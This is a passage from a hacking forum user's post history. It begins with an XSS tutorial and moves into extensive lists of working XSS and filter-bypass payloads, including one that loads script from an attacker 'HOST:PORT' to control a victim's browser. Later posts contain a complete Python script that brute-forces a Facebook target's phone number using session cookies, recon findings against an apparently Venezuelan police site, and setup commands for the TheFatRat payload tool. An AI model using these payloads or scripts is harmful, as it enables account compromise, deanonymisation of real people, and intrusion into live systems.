- Keylogging The attacker can register a keyboard event listener using addEventListener and then send all of the user's keystrokes to his own server, potentially recording sensitive information such as passwords and credit card numbers.
- Phishing The attacker can insert a fake login form into the page using DOM manipulation, set the form's action attribute to target his own server, and then trick the user into submitting sensitive information.
Although these attacks differ significantly, they all have one crucial similarity: because the attacker has injected code into a page served by the website, the malicious JavaScript is executed in the context of that website. This means that it is treated like any other script from that website: it has access to the victim's data for that website (such as cookies) and the host name shown in the URL bar will be that of the website. For all intents and purposes, the script is considered a legitimate part of the website, allowing it to do anything that the actual website can.
This fact highlights a key issue:
If an attacker can use your website to execute arbitrary JavaScript in another user's browser, the security of your website and its users has been compromised.
To emphasize this point, some examples in this tutorial will leave out the details of a malicious script by only showing <script>...</script>. This indicates that the mere presence of a script injected by the attacker is the problem, regardless of which specific code the script actually executes.
XSS Attacks
Actors in an XSS attack
Before we describe in detail how an XSS attack works, we need to define the actors involved in an XSS attack. In general, an XSS attack involves three actors: the website, the victim, and the attacker.
- The website serves HTML pages to users who request them. In our examples, it is located at http://website/.
- The website's database is a database that stores some of the user input included in the website's pages.
- The victim is a normal user of the website who requests pages from it using his browser.
- The attacker is a malicious user of the website who intends to launch an attack on the victim by exploiting an XSS vulnerability in the website.
- The attacker's server is a web server controlled by the attacker for the sole purpose of stealing the victim's sensitive information. In our examples, it is located at http://attacker/.
An example attack scenario
In this example, we will assume that the attacker's ultimate goal is to steal the victim's cookies by exploiting vulnerability in the website. This can be done by having the victim's browser parse the following HTML code:
This script navigates the user's browser to a different URL, triggering an HTTP request to the attacker's server. The URL includes the victim's cookies as a query parameter, which the attacker can extract from the request when it arrives to his server. Once the attacker has acquired the cookies, he can use them to impersonate the victim and launch further attacks.
From now on, the HTML code above will be referred to as the malicious string or the malicious script. It is important to note that the string itself is only malicious if it ultimately gets parsed as HTML in the victim's browser, which can only happen as the result of an XSS vulnerability in the website.
How the example attack works
The diagram below illustrates how this example attack can be performed by an attacker:
- The attacker uses one of the website's forms to insert a malicious string into the website's database.
- The victim requests a page from the website.
- The website includes the malicious script inside the response, sending the victim's cookies to the attacker's server.
- The victim requests a page from the website.
- The website includes the malicious string from the database in the response and sends it to the victim.
- The victim's browser executes the malicious script inside the response, sending the victim's cookies to the attacker's server.
Types of XSS
While the goal of an XSS attack is always to execute malicious JavaScript in the victim's browser, there are few fundamentally different ways of achieving that goal. XSS attacks are often divided into three types:
Persistent XSS, where the malicious string originates from the website's database.- Reflected XSS, where the malicious string originates from the victim's request.
- DOM-based XSS, where the vulnerability is in the client-side code rather than the server-side code.
The previous example illustrated a persistent XSS attack. We will now describe the other two types of XSS attacks: reflected XSS and DOM-based XSS.
Reflected XSS
In a reflected XSS attack, the malicious string is part of the victim's request to the website. The website then includes this malicious string in the response sent back to the user. The diagram below illustrates this scenario:
- The attacker crafts a URL containing a malicious string and sends it to the victim.
- The victim is tricked by the attacker into requesting the URL from the website.
- The website includes the malicious string from the URL in the response.
- The victim's browser executes the malicious script inside the response, sending the victim's cookies to the attacker's server.
How can reflected XSS succeed?
At first, reflected XSS might seem harmless because it requires the victim himself to actually send a request containing a malicious string. Since nobody would willingly attack himself, there seems to be no way of actually performing the attack.
As it turns out, there are at least two common ways of causing a victim to launch a reflected XSS attack against himself:
- If the user targets a specific individual, the attacker can send the malicious URL to the victim (using e-mail or instant messaging, for example) and trick him into visiting it.
- If the user targets a large group of people, the attacker can publish a link to the malicious URL (on his own website or on a social network, for example) and wait for visitors to click it.
These two methods are similar, and both can be more successful with the use of a URL shortening service, which masks the malicious string from users who might otherwise identify it.
DOM-based XSS
DOM-based XSS is a variant of both persistent and reflected XSS. In a DOM-based XSS attack, the malicious string is not actually parsed by the victim's browser until the website's legitimate JavaScript is executed. The diagram below illustrates this scenario for a reflected XSS attack:
- The attacker crafts a URL containing a malicious string and sends it to the victim.
- The victim is tricked by the attacker into requesting the URL from the website.
- The website receives the request, but does not include the malicious string in the response.
- The victim's browser executes the legitimate script inside the response, causing the malicious script to be inserted into the page.
- The victim's browser executes the malicious script inserted into the page, sending the victim's cookies to the attacker's server.
What makes DOM-based XSS different
In the previous examples of persistent and reflected XSS attacks, the server inserts the malicious script into the page, which is then sent in a response to the victim. When the victim's browser receives the response, it assumes the malicious script to be part of the page's legitimate content and automatically executes it during page load as with any other script.
In the example of a DOM-based XSS attack, however, there is no malicious script inserted as part of the page; the only script that is automatically executed during page load is a legitimate part of the page. The problem is that this legitimate script directly makes use of user input in order to add HTML to the page. Because the malicious string is inserted into the page using innerHTML, it is parsed as HTML, causing the malicious script to be executed.
The difference is subtle but important:
- In traditional XSS, the malicious JavaScript is executed when the page is loaded, as part of the HTML sent by the server.
- In DOM-based XSS, the malicious JavaScript is executed at some point after the page has loaded, as a result of the page's legitimate JavaScript treating user input in an unsafe way.
Why DOM-based XSS matters
In the previous example, JavaScript was not necessary; the server could have generated all the HTML by itself. If the server-side code were free of vulnerabilities, the website would then be safe from XSS.
However, as web applications become more advanced, an increasing amount of HTML is generated by JavaScript on the client-side rather than by the server. Any time content needs to be changed without refreshing the entire page, the update must be performed using JavaScript. Most notably, this is the case when a page is updated after an AJAX request.
This means that XSS vulnerabilities can be present not only in your website's server-side code, but also in your website's client-side JavaScript code. Consequently, even with completely secure server-side code, the client-side code might still unsafely include user input in a DOM update after the page has loaded. If this happens, the client-side code has enabled an XSS attack through no fault of the server-side code.
DOM-based XSS invisible to the server
There is a special case of DOM-based XSS in which the malicious string is never sent to the website's server to begin with: when the malicious string is contained in a URL's fragment identifier (anything after the # character). Browsers do not send this part of the URL to servers, so the website has no way of accessing it using server-side code. The client-side code, however, has access to it and can thus cause XSS vulnerabilities by handling it unsafely.
This situation is not limited to fragment identifiers. Other user input that is invisible to the server includes new HTML5 features like LocalStorage and IndexedDB.
Playing with tools
Our weapon: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
We can test XSS's in this site: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, but we need to bypass the security of the browser if we want to see any result, or of course work in blackbox ! ...
Okay it's great ! but I'll present you another friend, it's No tienes permitido ver enlaces. Registrate o Entra a tu cuenta ... weird site but it's safe , don't worry
, because I'm a good guy, I'll put the interesting links because I understand japanese is not ur natural language haha... Tools
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Testing side
- No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
- No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
- No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
- No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
- No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
- No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
- No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
And we can obtain information of interesting XSS techniques, like No tienes permitido ver enlaces. Registrate o Entra a tu cuenta and moar
#XSS Payload Scheme
[/list][/list][/list]
extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3#Agnostic Event Handlers
<brute contenteditable onblur=alert(1)>lose focus!
<brute onclick=alert(1)>click this!
<brute oncopy=alert(1)>copy this!
<brute oncontextmenu=alert(1)>right click this!
<brute oncut=alert(1)>copy this!
<brute ondblclick=alert(1)>double click this!
<brute ondrag=alert(1)>drag this!
<brute contenteditable onfocus=alert(1)>focus this!
<brute contenteditable oninput=alert(1)>input here!
<brute contenteditable onkeydown=alert(1)>press any key!
<brute contenteditable onkeypress=alert(1)>press any key!
<brute contenteditable onkeyup=alert(1)>press any key!
<brute onmousedown=alert(1)>click this!
<brute onmousemove=alert(1)>hover this!
<brute onmouseout=alert(1)>hover this!
<brute onmouseover=alert(1)>hover this!
<brute onmouseup=alert(1)>click this!
<brute contenteditable onpaste=alert(1)>paste here!
<brute style=font-size:500px onmouseover=alert(1)>0000#Filter Bypass procedure
<x onxxx=1
%3Cx onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1
<X onxxx=1
<x ONxxx=1
<x OnXxx=1
<X OnXxx=1
<x onxxx=1 onxxx=1
<x/onxxx=1
<x%09onxxx=1
<x%0Aonxxx=1
<x%0Conxxx=1
<x%0Donxxx=1
<x%2Fonxxx=1
<x 1='1'onxxx=1
<x 1="1"onxxx=1
<x </onxxx=1
<x 1=">" onxxx=1
<http://onxxx%3D1/
<x%2F1=">%22OnXxx%3D1#Probing to Find XSS
param1=1<1¶m2=2<1¶m3=3<1
#Location Based Payloads – Part I
<svg/onload=location='javascript:alert(1)'>
<svg/onload=location=location.hash.substr(1)>#javascript:alert(1)
<svg/onload=location='javas'%2B'cript:'%2B'ale'%2B'rt'%2Blocation.hash.substr(1)>#(1)
<svg/onload=location=/javas/.source%2B/cript:/.source%2B
/ale/.source%2B/rt/.source%2Blocation.hash.substr(1)>#(1)
<svg/onload=location=/javas/.source%2B/cript:/.source%2B/ale/.source
%2B/rt/.source%2Blocation.hash[1]%2B1%2Blocation.hash[2]>#()#
#Location Based Payloads – Part II
<svg onload=alert(tagName)>
<javascript onclick=alert(tagName)>click me!
<javascript onclick=alert(tagName%2Blocation.hash)>click me!#:alert(1)
<javascript: onclick=alert(tagName%2Blocation.hash)>click me!#alert(1)
<javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>/*click me!#*/alert(1)
<javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/alert(1)
<javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>'click me!#'-alert(1)
<javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>
'click me!</javascript:>#'-alert(1)
#Location Based Payloads – Part III
<javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:/*click me!#*/alert(9)
<javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:'click me!#'-alert(9)
<javascript: onclick=location=tagName%2bURL>click me!#%0Aalert(1)
<javascript:"-' onclick=location=tagName%2bURL>click me!#'-alert(1)
<j onclick=location=innerHTML%2bURL>javascript:"-'click me!</j>#'-alert(1)
<j onclick=location=innerHTML%2bURL>javascript:</j>#%0Aalert(1)
<javas onclick=location=tagName%2binnerHTML%2bURL>cript:"-'click me!</javas>#'-alert(1)
<javas onclick=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)
"-alert(1)<javascript:" onclick=location=tagName%2bpreviousSibling.nodeValue>click me!
"-alert(1)<javas onclick=location=tagName%2binnerHTML%2bpreviousSibling.nodeValue>cript:"click me!
<alert(1)<!– onclick=location=innerHTML%2bouterHTML>javascript:1/*click me!*/</alert(1)<!–>
<j 1="*/""-alert(1)<!– onclick=location=innerHTML%2bouterHTML>javascript:/*click me!
*/"<j"-alert(1)<!– onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
*/"<j 1=-alert(9)// onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
<j onclick=location=innerHTML>javascript%26colon;alert(1)//
<iframe id=t:alert(1) name=javascrip onload=location=name%2bid>
<svg id=?p=<svg/onload=alert(1)%2B onload=location=id>
<svg id=?p=<script/src=//3237054390/1%2B onload=location=id>
<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)>
<j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me!
<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>
%26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body.textContent>click me!
#Location Based Payloads – Part IV
protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
Source-Breaking Injections
"onafterscriptexecute=alert(1) 1='
"onbeforescriptexecute=alert(1) 1='
#Using XSS to Control a Browser
<svg onload=setInterval(function(){d=document;
z=d.createElement("script");z.src="//HOST:PORT";
d.body.appendChild(z)},0)>
#Multi Reflection XSS
<svg onload=write(1)>
p='onload=alert(1)><svg/1='
p='>alert(1)</script><script/1='
p=*/alert(1)</script><script>/*
p=*/alert(1)">'onload="/*<svg/1='
p=`-alert(1)">'onload="`<svg/1='
p=*/</script>'>alert(1)/*<script/1='
p=<svg/1='&q='onload=alert(1)>
p=<svg 1='&q='onload='/*&r=*/alert(1)'>
p=-alert(1)}//\
p=\&q=-alert(1)//
#XSS Without Event Handlers
<script>alert(1)</script>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=http://brutelogic.com.br/webgun/img/youtube1.jpg>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>
<svg><script xlink:href=data:,alert(1)></script>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 />
<animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>
#Transcending Context-Based Filters
<math><!–" href=javascript:alert(1)//
" href=javascript:alert(1) <math><!–
lol video<!–"href=javascript:alert(1) style=font-size:50px;
display:block;color:transparent;
background:url('//brutelogic.com.br/webgun/img/youtube1.jpg');
background-repeat:no-repeat –><math><!–
<svg><!–'-alert(1)-'
'-alert(1)-'<svg><!–
Credits to No tienes permitido ver enlaces. Registrate o Entra a tu cuenta document and @tfaraine
#8
International forum / Pentest bunker!
Febrero 14, 2017, 05:43:14 AM
Hey everyone ! - today like all days i was playing with gist -> No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta -- we can found a lot of good stuff ... and fresh ! - u need to make the right contacts and see the RSS FEEDS 8) (If u are interested pm-me ::) -
- No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
- No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
- No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
- No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
- No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#9
Hacking / Re:SearchDiggity v 3.1 un framework para el hacking con buscadores
Febrero 03, 2017, 11:32:38 PMNo tienes permitido ver enlaces. Registrate o Entra a tu cuentaNo tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Gracias por el aporte hay , version gnu/linux?
Enviado desde mi SM-G928T mediante Tapatalk
Podrias intentar correrlo con wine, aunque no creo que jale.
Requires: Microsoft .NET Framework v4
so... I think it's hard ;(!
#10
Debates, Reviews y Opiniones / Re:[WP] Pentesting
Febrero 01, 2017, 12:15:09 AM
Gpentest-standard is like owasp pentest guide... or another ...
for example in OWASP pentest guide you can see similar things like recon!
I mean, we can found a lot of 'ways' to execute a penetration testing well... will depends of the devices, area, deadline, risks, etc.
good job btw
for example in OWASP pentest guide you can see similar things like recon
!I mean, we can found a lot of 'ways' to execute a penetration testing well... will depends of the devices, area, deadline, risks, etc.
good job btw
#11
Ideas y Sugerencias / Suggestion: preventive analysis on uploads
Enero 31, 2017, 11:37:54 PM
Hey every one... I'm kinda new on this forum, but I like it... well it's simple i'm member of this forum: No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta from arab speakers... in this forum when someone without privilegies ( min. quantity of post required) upload something.
ex: Like crypters, rat, malware.
The uploaded file go to a queue ... so the designated members of the forum (mods) analyze the file and report if it's safe or not for the community... !!
Don't distribute malware between us, make it safe, that's all, take it like a suggestion, if it exist already fuck me and ... still doing what're doing ..
bytes
--
ex: Like crypters, rat, malware.
The uploaded file go to a queue ... so the designated members of the forum (mods) analyze the file and report if it's safe or not for the community... !!
Don't distribute malware between us, make it safe, that's all, take it like a suggestion, if it exist already fuck me and ... still doing what're doing ..
bytes
--
#12
Presentaciones y cumpleaños / hey
Enero 31, 2017, 07:38:14 PM
salam .. good forum, greetings from jordania!
Im programmer (java c# swift) and security analist, good luck for everyone
Im programmer (java c# swift) and security analist, good luck for everyone
#13
MAC OSX / Re:kontrol0 - Tools pack for pentesting.
Enero 31, 2017, 06:25:22 PM
the next time you can put interesting information about your thread to make it exciting
CitarListado de Herramientas
Information Gathering
✓ Amap
✓ Automater
✓ CaseFile
✓ arpscan
✓ dnmap
✓ Fierce
✓ GoLismero
✓ hping3
✓ Maltego Teeth
✓ masscan
✓ Nmap
✓ Zenmap
✓ know-scan
✓ Recon-ng
✓ theHarvester
✓ URLCrazy
Network Tools
✓ Autossh
✓ SET
✓ Exploit pack
✓ search-exploits
Forensics Tools
✓ pdf-parser
✓ pdfid
✓ peepdf
✓ OSXAuditor-master
✓ Binary Cookie reader
Web Applications
✓ Burp Suite
✓ nikto
✓ DirBuster
✓ fimap
✓ jSQL
✓ sqlmap
✓ Vega
✓ Wfuzz
✓ mitmproxy
✓ mitmdump
✓ zaproxy
✓ webscarab
✓ wapiti
✓ SQL injector
#14
Dudas y pedidos generales / Re:Es posible realizar facebook phone number brute force
Enero 31, 2017, 06:02:14 PMimport urllib2
import re
import threading
import sys
manual_cookie = raw_input("Get Cookie From https://m.facebook.com/login/identify?ctx=recover After Submitting Your Target: ");
user = raw_input("Username: ")
a = urllib2.build_opener()
a.addheaders.append(('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'))
a.addheaders.append(('Cookie',manual_cookie))
cop = a.open("http://m.facebook.com/login/identify?ctx=recover","ctx=recover&email="+user).read()
lasttwonumbers = re.findall('<ul style="margin:0px"><li>(.*?)</li></ul>',cop)
print "Last 2 #s of Target's Phone: "+lasttwonumbers[0][-2:]
cc = raw_input("Country Code: ")
nb_bt = raw_input("#s Between Country Code & Last 2 #s: ")
file_save = open('out.txt','a')
opener = urllib2.build_opener()
url = 'http://www.facebook.com/search/more?q=%2B'
zeroz = 0
manual_cookie = raw_input("Logged in Full Facebook Cookie: ")
print "[+] Threads are Set To Default To 5\n[+] Bruting Started"
def brute(manual_cookie,number):
page = url + number
opener.addheaders.append(('Cookie', manual_cookie))
get = opener.open(page)
html = get.read()
acc = re.findall('<div class="_zs fwb" data-bt="{"ct":"title"}"><a .*>(.*)<span class="_138">.*</span></a><span class="_5dgp">.*</span></div>', html)
accc = re.findall('<div class="_zs fwb" data-bt="{"ct":"title"}"><a .*>(.*)</a><span class="_5dgp">.*</span></div>', html)
if acc:
if re.findall(user, html):
print "\nTarget's Mobile #:\n[+] " + acc[0] + " => +" + str(number) + "\n"
file_save.write("\nTarget's Mobile #:\n[+] " + acc[0] + " => +" + str(number) + "\n\n\n")
print "Good Luck"
sys.exit()
else:
print "[+] " + acc[0] + " => +" + str(number)
file_save.write("[+] " + acc[0] + " => +" + str(number) + "\n")
elif accc:
if re.findall(user, html):
print "\nTarget's Mobile #:\n[+] " + accc[0] + " => +" + str(number) + "\n"
file_save.write("\nTarget's Mobile #:\n[+] " + accc[0] + " => +" + str(number) + "\n\n\n")
print "Good Luck"
sys.exit()
else:
print "[+] " + accc[0] + " => +" + str(number)
file_save.write("[+] " + accc[0] + " => +" + str(number) + "\n")
else:
print "[-] => +" + str(number)
while int(len(str(zeroz))) < int(nb_bt)+1:
number = str(cc)+str('%0*d' % (int(nb_bt), zeroz))+str(lasttwonumbers[0][-2:])
t=threading.Thread(target=brute,args=(manual_cookie,number,))
number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+1))+str(lasttwonumbers[0][-2:])
to=threading.Thread(target=brute,args=(manual_cookie,number,))
number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+2))+str(lasttwonumbers[0][-2:])
tt=threading.Thread(target=brute,args=(manual_cookie,number,))
number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+3))+str(lasttwonumbers[0][-2:])
tth=threading.Thread(target=brute,args=(manual_cookie,number,))
number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+4))+str(lasttwonumbers[0][-2:])
tf=threading.Thread(target=brute,args=(manual_cookie,number,))
t.start()
to.start()
tt.start()
tth.start()
tf.start()
t.join()
to.join()
tt.join()
tth.join()
tf.join()
zeroz += 5
while 1:
break
file_save.close()Start studying the code and try ... "upgrade the wheel" and not create something from scratch... You use the script correctly? , put the manual cookie properly? .. .
bye
#15
Hacking ShowOff / Re:"Base de datos" del CICPC
Enero 31, 2017, 04:31:04 PM
Good job, dirbuster can give you that result and search engine dorks; example:
When you login POST response with the next parameters:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta show us the next:
/home/cajadeah/public_html/txt/ PATH DISCLOSURE
'simpadsa'@'localhost'
'cajacicp_bolivar'@'localhost'
'cajacicp_miranda'@'localhost'
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta ulalah
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta -> login panel
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta wtf
Moar?
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta (nothing interesting)...
When you login POST response with the next parameters:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta show us the next:
/home/cajadeah/public_html/txt/ PATH DISCLOSURE
'simpadsa'@'localhost'
'cajacicp_bolivar'@'localhost'
'cajacicp_miranda'@'localhost'
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta ulalah
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta -> login panel
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta wtf
Moar?
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta (nothing interesting)...
#16
Bugs y Exploits / Re:Backcookie la herramienta de conexión remota
Enero 30, 2017, 11:49:35 AM
good job!, ready to test my shells, b374k is a good shell btw
#17
Hacking / Re:TheFatRat - Tutorial [1] - Que es? - Instalación - Ejecutarlo
Enero 30, 2017, 11:30:24 AMapt-get install mingw32
git clone https://github.com/Screetsec/TheFatRat.git && cd TheFatRat
cd setup
bash setup.sh
chmod +x fatrat
./fatrat
Páginas1
